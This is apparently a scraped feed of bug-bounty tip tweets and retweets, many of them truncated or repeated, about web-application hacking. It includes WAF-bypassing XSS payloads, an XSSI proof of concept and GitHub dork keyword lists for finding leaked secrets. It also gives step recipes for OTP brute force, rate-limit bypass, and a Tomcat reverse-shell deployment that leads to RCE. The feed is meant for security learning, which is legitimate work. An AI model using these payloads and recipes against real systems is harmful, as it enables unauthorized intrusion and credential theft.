Thanks to @ADITYASHENDE17 @u1tran00b @upen1994 https://t.co/Wl5uQJiQ6P
RT @hacback17: It was a fantastic session loaded with lots of live examples. Thank you

Video: https://t.co/hu5Qw0J18i

Slides: https://t.co/pOIyo27sbC

#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #

RT @th3hokag3: Bug Bounty Tip:

#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity https://t.co/1FU0

Bug Bounty Tip:

#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity https://t.co/1FU0

RT @trbughunters: ️Find Passwords, Exposed Log Files with Google Dorks ️
️️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

NEW VIDEO ALERT🚨
Your Sunday dose of Information📖
The next one on the series, Identifying Technologies for your Targets!

https://t.co/qKr1pPXn2t

Trying to make sort of a Beginner friendly #BugBountyCourse! Do check it out❤️

Hope it helps :)
#bugbountytips #bugbounty
RT @intigriti: How can you leverage out of scope domains without breaking a program's
@healthyoutlet enumerates OOS subdomains & creates a wordlist to use for in-scop
RT @AldenAous: 🚀💡 XSS from another level 💡🚀
https://t.co/YFIsP4lt9K

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec

RT @hackd00r: Subscribe to our Telegram Channel for Hackdoor Cyber Security Events a
🤖🤖🔥🔥👾👾👇👇👇

https://t.co/sqSFXdEOmM

#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops

RT @securestep9: Stuck at home due to Coronavirus? It is a great time to learn about fin

Here's a great collection of write-ups collected by @PentesterLand from 2012 to 2020:

#BugBountyTips
#BugBountyWriteups

https://t.co/PKKHWJig9D https://t.co/QDo79j0nTP
RT @hsakarp_ilajna: comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains

#bugbountytips   #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity

RT @KomodoGT: https://t.co/IqiCVzbCkd MR r0b0t.clip >>> #blockchain #open

RT @D0rkerDevil: #bugbountytips
webarchive > found email change unconfirmed link > checked source > found e

at this point i cannot change the mail of he user as it won't be good for the user

reported

#bugbounty #security
RT @farah_hawa01: NEW VIDEO: In this video, I explain how JWTs work and how to att
https://t.co/RR4Dmclkyw
RT @micha3lb3n: Just gimme a list of urls or a url, I can do the following :

1. Extract all the hidden endpoints from the source.

2. Filter out live domains
3. Brute force endpoints with a word list.

And all these really fast

says SourceWolf.

https://t.co/yDS86kXO3h

{..}

#bugbountytips

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas

#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #

#programfolback #tutorial #code #opensource
RT @SalahHasoneh1: ️Top 10 - GitHub Dorks for Finding API Keys ️
️️

Rebuilt in a better way

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht

RT @roughwire: Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-ad

Triaged with "High" instead of "Critical" . Don't know what is wrong !

#bugbountytips Tweet has tip as well :D

RT @laud3b: Shellshock still work for some server you can also try
nmap script.
Nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty https://t.co/hWfe6AZWsi
RT @D4Vinci1: Just published a script that fingerprint BigIP servers in a given list of dom
link:
https://t.co/ua0FR2xwrm
#bugbounty
#bugbountytips
#Pentesting #bigip #F5 https://t.co/OqbegbmIOF
RT @manas_hunter: Bypassing 2FA with CSRF.

Apply this for easy bounties:)

#bugbountytips https://t.co/yKdQmwloNq
RT @K4r1it0: shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,po
#bugbountytips
#bugbountytip https://t.co/nMahaMlFTt
RT @intigriti: Want to find critical bugs by changing a single header? Do just like @hacke
RT @_mkahmad: Account Takeover by JWT Token forging by me :) #bugbountytips #bu
RT @fuxksniper: GraphQL — Common vulnerabilities & how to exploit them:
https://t.co/gFbaCcFUhD

Understanding Graphql :
https://t.co/v57mt8ZAsf

Some good graphql stuff

(Not by me)
#bugbountytips #bugbountytips
RT @D0cK3rG33k: GiHub Dorks for Finding API Keys, Tokens and Passwords
api_key
“api keys”
authorization_bearer:
oauth
auth
authentication
client_secret
api_token:
“api token”
client_id
password
user_password
user_pass
passcode
client_secret
secret
password hash
OTP
user auth
#bugbountytips

RT @AldenAous: Account Takeover tips 👀👍🏻

#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/hhKW
RT @TheHackersNews: Watch Out 🔥

Hackers are abusing #Google Analytics service to bypass CSP web-security feature and

Learn how it works — https://t.co/82qxzATWCR

#infosec #cybersecurity #bugbountytips #bugbountytip https://t.co/R5XyQwU5mk

RT @intigriti: Excellent e-mail address payloads by @securinti! 🤯
Rewatch "You've got pwned: exploiting e-mail systems" at #NahamCon here: https://t.
RT @cry__pto: Tutorial on privilege escalation and post exploitation tactics
in Google Cloud Platform environments:(PDF) 66 PAGES:
https://t.co/6LGDGTiI0m
#PenTest #Hacking #bugbountytips #redteam
RT @ADITYASHENDE17: https://t.co/kotXpSr6G8 /plugins/servlet/oauth/users/icon-u

I always fuzz target name with my site name to gain SSRF AWS metadata.

Thanks to @D0rkerDevil SSRF write-up.

Remaining Google it
#bugbountytips #kongsec
RT @daoud_youssef: one line bash script to get every domain on specific IP
curl -s -k -X $'GET' -H $'Host: https://t.co/L2UFEqV7P7' --url 'https://t.co/nxZ1TBmTS
#bugbountytips #bugbountytip @rapiddns
RT @pdiscoveryio: #httpx v0.0.7 updates:-

☑Added TLS Probe (Subdomains from SSL)

☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length

https://t.co/baW40ThDCi

#hackwithautomation #bugbounty #security #bugbountytips https://t.co/caIs5Uz6Tu

RT @mirhatx: Bash code for manuel subdomain takeover testing:

cat subdomains.txt | xargs -n1 dig @1.1.1.1 | grep -A10 NXDO | grep CNAME

#BugBounty #bugbountytips #bugbountytip @hacktivist1337

RT @0x0Cj: Yay, My first writeup
I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
https://t.co/N4gSywXvx4
RT @safe_buffer: Wait !! Are you serious? are you going to help ppl to learn smt could re
RT @AldenAous: 🚀 CORS Protection RegEx Bypass 🚀 by:@trbughunters

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://

RT @HusseiN98D: As per the vote results, here you go!
A cool XXE resulting from a SSRF found on local company website during a pentest. DMs
#bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
How to Bypass The Rate limiting✌️✌️

Add this header in to the post request with an IP address.

X-Forwarded-For: (Any IP Address )

#bugbountytips #bugbounty #vulnerability #Hackers #exploit

RT @ITSecurityguard: Massive shoutout to https://t.co/ZgPbPhhgY5 for creating https:/

it is exactly what most of you people are looking for 😍

#recon #bugbountytips #BugBounty #AutomationAnywhere

RT @heald_ben: Easy way to find exposed production code:

1. Find a Gitlab hosted sub domain, usually named “code.domain” or “gitlab.domain”

2. Even if login is required, try the

“/snippets” endpoint.

3. View internal source code snippets.

#bugbountytips #bugbounty #bugbountytip

RT @11xuxx: RCE on big company
1. subdomain enum
2. used "ffuf" and found tomcat on ";/..;/manager"
3. weak cred (used hydra)
4. "/manager/html" blocked, "/manager/text" was not
5. used "msfvenom" and crated reverse shell war
6. used "curl" and deployed the war file
7. rce!
#bugbountytips https://t.co/AfCqUVXyuK
RT @_Rutik_Sangle_: Finally today I completed the #100daystolearnandimprove challe
journey ahead.
Thanks to all
RT @HusseiN98D: An overview of what I did for my recent $10 000 bug. Always go for th
RT @roughwire: Running @pdnuclei on multiple template and don't want to see informat

cat nuclei-out.txt | grep -v -e templateid1 -e templateid2

#bugbounty #bugbountytips
Running @pdnuclei on multiple template and don't want to see informative or low impac

cat nuclei-out.txt | grep -v -e templateid1 -e templateid2

#bugbounty #bugbountytips
Subscribe to our Telegram Channel for Hackdoor Cyber Security Events and Webinars In
🤖🤖🔥🔥👾👾👇👇👇

https://t.co/sqSFXdEOmM

#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops

I just published How I was Able To bypass Cloudflare WAF https://t.co/YBl9gMLUB0
#bugbountytips @_abhichimbalkar @deep803937 @chevonphillip @dybtron
Sublist3r is a tool designed to enumerate subdomains of websites. It helps penetration t
https://t.co/20u5jZOPaR
#cybersecurity #hackingtools #bugbountytips https://t.co/3TLqEVmFaV
RT @AmitMDubey: This little command will get all the Wayback endpoints to compare it

Tools -
waybackurls & unfurls by @TomNomNom
httpx by @pdiscoveryio

(I know it can be further optimized)

#bugbounty #bugbountytips #bugbountytips https://t.co/oBT5LNjmk6
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/othzLzOqx1
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/ZVrslIQtoM
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/ALXAVUiIf7
RT @11xuxx: XXE
1. change password func -> JSON
2. converted to XML -> 200 OK
3. created dtd file on my ec2 and started webserver on port 80
4. crafted a XXE payload!
5. bounty!

Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change th
#bugbountytips https://t.co/37JBcasx8h
Two good articles about HTTP Request Smuggling.
1.https://t.co/trsGgcBCOg
2.https://t.co/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @pdnuclei: Here is a #tip for using nuclei for a given list of subdomains, Nuclei accep

#bugbountytips https://t.co/C0pZpelj8z
RT @F3RR4R1_R3D: Why am i just now reading this? Anyways good recon methodology
RT @KomodoGT: I had some spaghetti last night this is what I found this morning. #bug
I had some spaghetti last night this is what I found this morning. #bugbountytips https:
RT @rnd_infosec_guy: #bugbountytip

Don’t propagate bug bounty as a reasonable job model. It is the same as saying everyon

#bugbountytips #infosec #BugBounty

RT @ssh0x00r: does we need to know JavaScript to get started in bug bounty ?

#bugbountytips #hacking #infosec #hackerone

does we need to know JavaScript to get started in bug bounty ?

#bugbountytips #hacking #infosec #hackerone

RT @chiraggupta8769: Awesome Tip By @intigriti And Tool By @sratarun #bugbountytip
RT @_YashGoti_: Need to automate your recon process with telegram chat here you go.

#bugbountytips
#recon
#automate

https://t.co/ZGU4fp0W5q
RT @krizzsk: A small but effective way to recon and get internal subdomains to increase
Why am i just now reading this? Anyways good recon methodology and nice #bugbount
RT @dynamicCISO: With @HarshBothra_, we have delivered a great session on #Offensi

Video: https://t.co/YPfGj2ppYE

Slides: https://t.co/2ntCYwZYwH
@rneelmani @hacback17 #infosec #bugbountytips #bugbounty #girlswhocode #Linux
RT @HackerOn2Wheels: Bypass I learned from @rene_kroka this week:
https://t.co/SzIavQtyOR

onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,

👆 = alert(1)

#bugbounty #bugbountytips
RT @Ranger_one_: Great Resource for Template Injection!

https://t.co/gT3WvtEi3I

https://t.co/rVSOBfkZUu

https://t.co/CZsbChIJ7a

#bugbountytip #bugbountytips #bugbounty

#bugbountytips
webarchive > found email change unconfirmed link > checked source > found e

at this point i cannot change the mail of he user as it won't be good for the user

reported

#bugbounty #security
RT @Faeeqjalali: OTP bypass .
Checked the respone with entering wrong OTP.
Changed status from "invalid otp " to
"Valid otp".
BOOM.... P3
#bugbountytips
#bugbounty
#infosec
OTP bypass .
Checked the respone with entering wrong OTP.
Changed status from "invalid otp " to
"Valid otp".
BOOM.... P3
#bugbountytips
#bugbounty
#infosec
RT @hsakarp_ilajna: Things you should Gather: #Osint :

metadata
organization’s employees
Phone numbers
Open hours and holidays
Key employees
job offers
Partner companies
News 
which CMS the target is using.
Hidden directories
Leaked Info
open ports
software version

##bugbountytips   #bugbounty

🧮 ️Top 25 Local File Inclusion (LFI) Parameters ️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

⛓️Get Reflected XSS within 3 minutes ⛓️by:@gkhck_

https://t.co/ZSGoyAvqdo

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip

RT @ja1sharma: Bash Script to scrap spring applications via Shodan and enumerating se
Usage: ./springShodanBash.sh <redact>
Output: <redact-Spring_FFUF.txt>
>:https://t.co/zFNiw1F1SD
Any suggestions are welcome.

Credit: @K4r1it0 @Madrobot_

#bugbounty #bugbountytips https://t.co/YWVbXwACTN
It was a fantastic session loaded with lots of live examples. Thank you so much, @harsh

Video: https://t.co/hu5Qw0J18i

Slides: https://t.co/pOIyo27sbC

#bugbounty #bugbountytips #security #infosec #ciso #hacker #girlswhocode #linux #

RT @Virdoex_hunter: Bug bounty fast hunting find all subdomains using all tools and the
It was great to have a talk with @dynamicCISO. In case if you missed, find my slides &a

Slides: https://t.co/d77RbZXwqG

Stream: https://t.co/vrILyaZoLj

Thanks, @hacback17 for carrying this out.

#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd

With @HarshBothra_, we have delivered a great session on #Offensive #Recon. The aud

Video: https://t.co/YPfGj2ppYE

Slides: https://t.co/2ntCYwZYwH
@rneelmani @hacback17 #infosec #bugbountytips #bugbounty #girlswhocode #Linux
RT @_ayoubfathi_: Ran into an API subdomain with an empty response?

You may get lucky and fetch the full API spec by hitting the following endpoints:

/swagger-ui.html
/swagger/swagger-ui.html
/api/swagger-ui.html
/v1.x/swagger-ui.html
/swagger/index.html
...

#bugbountytips #bugbounty #hackerone

RT @chiraggupta8769: Top 25 Remote Code Execution (RCE) Parameters by @trbughunt

#bugbountytips #bugbountytip #bugbounty https://t.co/XKItUZGzAx

RT @harshbothra_: Easily find exposed secrets from Github and Identify manually if they

#bugbountytip #bugbountytips #bugbounty #security https://t.co/vYPGFPW2lF

Account Takeover tips 👀👍🏻
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/hhKW
RT @th3hokag3: BUG BOUNTY TIP:

#bugbountytips #bugbounty #bugbountytip #cybersecurity #infosec https://t.co/QpJa

RT @cyanpiny: #bugbountytips https://t.co/sd2j3XrAoH
#bugbountytips https://t.co/sd2j3XrAoH
CloudFlare Origin Certificate

How to find out the real server IP hidden behind the Cloudflare CDN

443.https.tls.certificate.parsed.subject.common_name: CloudFlare Origin Certificate

#bugbountytips #bugbounty
RT @SalahHasoneh1: ️Manipulation of email by Latin letters ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

Bash Script to scrap spring applications via Shodan and enumerating sensitive endpoints
Usage: ./springShodanBash.sh <redact>
Output: <redact-Spring_FFUF.txt>
>:https://t.co/zFNiw1F1SD
Any suggestions are welcome.

Credit: @K4r1it0 @Madrobot_

#bugbounty #bugbountytips https://t.co/YWVbXwACTN
What I consider the top two learning and testing books for #pentesting and #bugbounty

#cybersecurity #bugbountytips #penetrationtesting

https://t.co/d9bPjpqcxH
RT @AldenAous: Second medium blog-post:

Stealing your Paytm information using XSS by: @VirenPawar_

https://t.co/fPs3KiXFL0

#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring

🚀💡 XSS from another level 💡🚀
https://t.co/YFIsP4lt9K

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec

RT @ehsayaan: If you found some api key or secret key then these are some tips to Esca

#BugBounty #bugbountytips https://t.co/5NjdDA1D4D

RT @pwn0sec: https://t.co/D5AYcIaVmU

#bugbounty #bugbountytips #vulnerabilityanalysis #Flutter

https://t.co/D5AYcIaVmU

#bugbounty #bugbountytips #vulnerabilityanalysis #Flutter

Great Resource for Template Injection!

https://t.co/gT3WvtEi3I

https://t.co/rVSOBfkZUu

https://t.co/CZsbChIJ7a

#bugbountytip #bugbountytips #bugbounty

RT @chiraggupta8769: A small Burpsuite trick which helped @amitmdubey to find Blind

Step 1: Use Intruder to Bruteforce Headers

Step 2: Add Burp collaborator URL as value
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use Tarborator Extension to monitor hit

#bugbounty #bugbountytips https://t.co/KN0QuuZkyO

RT @faizalabroni: 1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
2. found https://t.co/dxxS1HALdy
3. clone & use https://t.co/87gxJisJNN
4. ./svn-extractor.py --url https://t.co/YrfE7sv51h --match database.php
5. result in output dir and just open it
#bugbounty #bugbountytips https://t.co/nNVCsstLny
RT @terjanq: I recently discovered a fancy way to execute arbitrary XSS without parenth

https://t.co/K0ebjvpmxq

#javascript #bugbountytips #xss https://t.co/7848wYvnU2

RT @r00t98: Bypass rate limit to account takeover

1. Server limited brute force OTP by ip.

2. Install & config ip rotate(burp suite extender).
3. Send password reset code.
4. Brute force OTP with intruder.
5. Change password.

#bugbountytip #bugbountytips
RT @bountyhunter_fr: Here is a way to escape a restricted shell in linux
#bugbountytips

What would you have done to escape a restricted shell? https://t.co/BzI7PLslmb

comments in the source code
google hacking
Wayback Machine
IPs
shodan
Censys
Whois
Similar Domains
#Searching Social Media
VPN provider
#S3 Bucket Enumeration
#Emails
#GITHUB recon
#Subdomains

#bugbountytips   #bugbounty
#infosec #bugbountytip
#osnit_tool #cybersecurity
Things you should Gather: #Osint :

metadata
organization’s employees
Phone numbers
Open hours and holidays
Key employees
job offers
Partner companies
News 
which CMS the target is using.
Hidden directories
Leaked Info
open ports
software version

##bugbountytips   #bugbounty

⏰Reflected XSS on Sony with Google Dork & Akamai WAF Bypass ⏰
https://t.co/raJdKzYbqt

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip

🚀 CORS Protection RegEx Bypass 🚀 by:@trbughunters

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://

RT @hsakarp_ilajna: My #twitter and #linkedin feed is flooded with Bug Bounty tips Tw
#bugbountytips #cybersecurity #LinkedIn #bounty #hacking #bugs #vulnerabilities #b
RT @BugBountyRecon: What should you look for when attacking OAuth2?

A nice overview: https://t.co/TtbQrQmuBS

#bugbountytips #BugBounty
RT @arkadiyt: I've added Intigriti and YesWeHack support to my bounty-targets-data cr

Happy hunting: https://t.co/IPZbv0yBUs #bugbounty #bugbountytips

RT @AldenAous: ️Ways to bypass rate limit ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @trbughunters: ️Top 25 Remote Code Execution (RCE) Parameters ️
️️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | #follow Java
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @iambeingjoker: #JSON #Web #Tokens | Authenticating #single page #apps using #
#javascript #hacking #USDT #Bitcoin #coding #bugbountytips #bughunting #tipsandtr
RT @m4ll0k2: https://t.co/eD8AUajPQw - Simple Python tool for find a unique words in
#bugbountytips https://t.co/TIjT5Trvkd
RT @taaminz: Access to internal company info
1. Find an internal dev domain using https://t.co/CbAoq9VFF4
2. Subdomain enumeration on internal domain
3. Find internal API subdomain
4. API key and endpoint in javascript file
5. Access to internal info
#bugbountytips #bugbounty
RT @pdnuclei: #oneliner

✅ Subdomain enumeration
✅ Full port scan
✅ HTTP web server detection

#security #bugbountytips #portscan #subdomain #chaos https://t.co/Xqm5MZdnuY

My #twitter and #linkedin feed is flooded with Bug Bounty tips Tweets. I am really fee
#bugbountytips #cybersecurity #LinkedIn #bounty #hacking #bugs #vulnerabilities #b
RT @chickflow0: when your report is duplicated and closed as N/A!
@Hacker0x01 - keep hunting!...

#hackerone #togetherwehitharder #bugbounty #bugbountytips #vulnerabilityanalysis #

RT @BeingjokerMeme: JSON Web Tokens | Authenticating single page apps using JWT |
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
when your report is duplicated and closed as N/A!
@Hacker0x01 - keep hunting!...

#hackerone #togetherwehitharder #bugbounty #bugbountytips #vulnerabilityanalysis #

RT @GainSec: How Install CloudGoat on Ubuntu Server
-
-
🤓 Follow @gainsec
-
https://t.co/OCOXHP5m3Z
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
How Install CloudGoat on Ubuntu Server
-
-
🤓 Follow @gainsec
-
https://t.co/OCOXHP5m3Z
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
How to Answer tricky Javascript Interview Questions | #follow Javascript https://t.co/c
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @MeetAn0nym0us: Just published an Article on Android Apps Pen-testing.
Don't forget to share your thoughts on it.
Thanks!
https://t.co/a1pno2oioa
#BugBounty #bugbountytips #TogetherWeHitHarder #hackerone #ItTakesCrowd https:
RT @naglinagli: Google dork for CVE-2020-3452
'inurl:logon.html "CSCOE"'
(It will find exposed Cisco SSL-VPN domains, not 100% of them are vulnerable, but mos
After reaching a login page, try one of @aboul3la POC's
#bugbountytips https://t.co/GDXV3oZDwA
#JSON #Web #Tokens | Authenticating #single page #apps using #JWT https://t.co/P
#javascript #hacking #USDT #Bitcoin #coding #bugbountytips #bughunting #tipsandtr
#JSON #Web #Tokens | Authenticating #single page #apps using #JWT https://t.co/P
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @black_hat_india: Disclosing user's sensitive information like phone number, tokens

Captured login request via BURP.

/hub/v1/user/otp/[email protected]
/hub/v1/user/otp/[email protected]
/hub/v1/user/otp/[email protected]

#bugbountytips #infosec
RT @black_hat_india: LFI to RCE
1. ffuf on "/" -> "redacted-api" -> 302
2. ffuf on "redacted-api/" -> "application.wadl" -> 200
3. all operations were auth protected
4. didn't give up and tested ~200 operations
5. fount LFI, no auth
6. admin creds in plaintext, logged in and got RCE
#bugbountytips https://t.co/unotYtxeWY
RT @dwisiswant0: FinDOM-XSS - Find for Possible DOM Based XSS Vulnerability
https://t.co/Q7MU6pgIsU

Inspired by @dark_warlord14 by JSScanner tool, and @aslanewre with the possible patt

#bugbounty #bugbountytips #infosec https://t.co/jcSd4vtGpD

RT @11xuxx: Twig SSTI
1. Submitted {{7*7}} and received "you password is: 49"
2. Tried "registerUndefinedFilterCallback" func, it was blocked by Imperva WAF https://
3. read Twig source code and found "registerUndefinedFunctionCallback"
4. WAF bypassed and RCE!
#bugbountytips https://t.co/hXtPdo9Kkp
RT @black_hat_india: subfinder -nW -silent -t 25 -d $DOMAIN | shuffledns -silent -d $DO

Some crazy oneliners possible for subdomain discovery

#bugbountytips
RT @Yumi_Sec: An interesting trick: you can bypass a WAF during a XSS attack on ASP(d

#BugBounty #BugBountyTips #InfoSec

(Credit to Acunetix)
Full article: https://t.co/Eq2nl9cyQ6 https://t.co/yy3tuRHDbq
RT @iambeingjoker: JSON Web Tokens | Authenticating single page apps using JWT | Ho
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @pwn0sec: Pwned @andripwn - Bypassing WAF XSS with language

/></noscript></form><script language="javascript">window.alert(1

#xss #bypasswaf #bugbountytips #bugbountytip #penetrationtesting https://t.co/3fJm

RT @andripwn: Bypassing WAF XSS with language

/></noscript></form><script language="javascript">window.alert(1

#xss #bypasswaf #bugbountytips

RT @andripwn: Waf Bypassing SQL-Injections DIOS
Leads to Recon Find Cpanel Login

#bugbountytips #bypassWaf #hackerone https://t.co/T317tT3gkb

JSON Web Tokens | Authenticating single page apps using JWT | How to use https://t.c
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
JSON Web Tokens | Authenticating single page apps using JWT | How to use https://t.c
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @Hxzeroone: #Bugbountytips
If you’re testing a website which lets you use your account on Xbox/Setup Tv.Visit hxxp
https://t.co/gnZry4m4Wl
RT @trbughunters: ️Top 25 SQL Injection Parameters for @trbughunters ️
️️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @trbughunters: ‍‍☠Top
‍ ️ 25 Server-Side Request Forgery (SSRF) Dorks ‍
‍☠️

Note: The popularity of dorks can vary.

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @andripwn: Bug Bounty GitLab : Stored XSS in Wiki pages
Status : Patched
Writeup's here::
https://t.co/9ayVoenny5

#bugbounty #bugbountytips #hackerone #gitlab

RT @xalerafera: If you find the host hosting the WordPress CMS, then try to see, if xmlrp

Then, through the PingBack function, you can get Blind SSRF)

#bugbounty #hackerone #bugbountytip #bugbountytips https://t.co/82mOpzrXCo

RT @bendtheory: just learned about ffuf’s response size filter -fs

super useful when a site returns 200 for bad paths instead of 404’s. you can even set a r

friendship ended with dirbuster

now ffuf is my best friend

#bugbountytips
RT @jdksec: Need a quick way to request 1000's of URLs in burp without crashing your b

cat yahoourls.txt| parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

#bugbounty #bugbountytips #bugbountytip https://t.co/61yAw3qCLk

RT @Th3G3nt3lman: P1 of the day on @Bugcrowd :
1- https://host =>403 forbidden
2- https://host/app =>Redirect to corporate SSO
3- https://host/app/main.js =>IP:8005 and Api_key
4- https://IP:8005/ => https://IP:8005/swagger/ui/index#/Admin
5- Use key in swagger=> Info Disclosure

#bugbountytips
RT @IfrahIman_: Want to find some new subdomains for your target?
Use SecurityTrails API 🔥 to enumerate.

#bugbountytips https://t.co/vHq8M1wBC5
RT @bendtheory: XSSI example PoC to fix JS undefined/type errors

<script>
x = function(y, z) { };
prof = {'manager': {'load':null, 'fn':x}}
prof.manager.load = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://t.co/kDPMJMFetz"></script>

#bugbountytips

RT @bendtheory: #xss payload for when

1. a parameter is reflected in javascript

2. it’s being inserted into the DOM via innerHTML
3. HTML encoding and not Javascript encoding is used
4. WAF blocks common payloads

\x3Ctextarea+onauxclick\x3Dconfirm(1)\x3Eright+click+here

#bugbountytips
RT @laud3b: Finding for API keys, Tokens and Passwords with Github Dorks
#bugbounty #bugbountytips https://t.co/lOS0parDCn
RT @mase289: I just published The $1,000 worth cookie
A story of DOM XSS in https://t.co/GqkQXyBLmG
https://t.co/kYEijPwppN

#BugBounty #bugbountytips #xss

RT @AldenAous: - SQL'injection with WAF ByPass

If you find the host IP address of the target. You can remove the WAF by sending a requ
If the host accepts requests directly.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty https://t.co/HNM
RT @chiraggupta8769: Account Takeover By JWT Token Forging By @_mkahmad

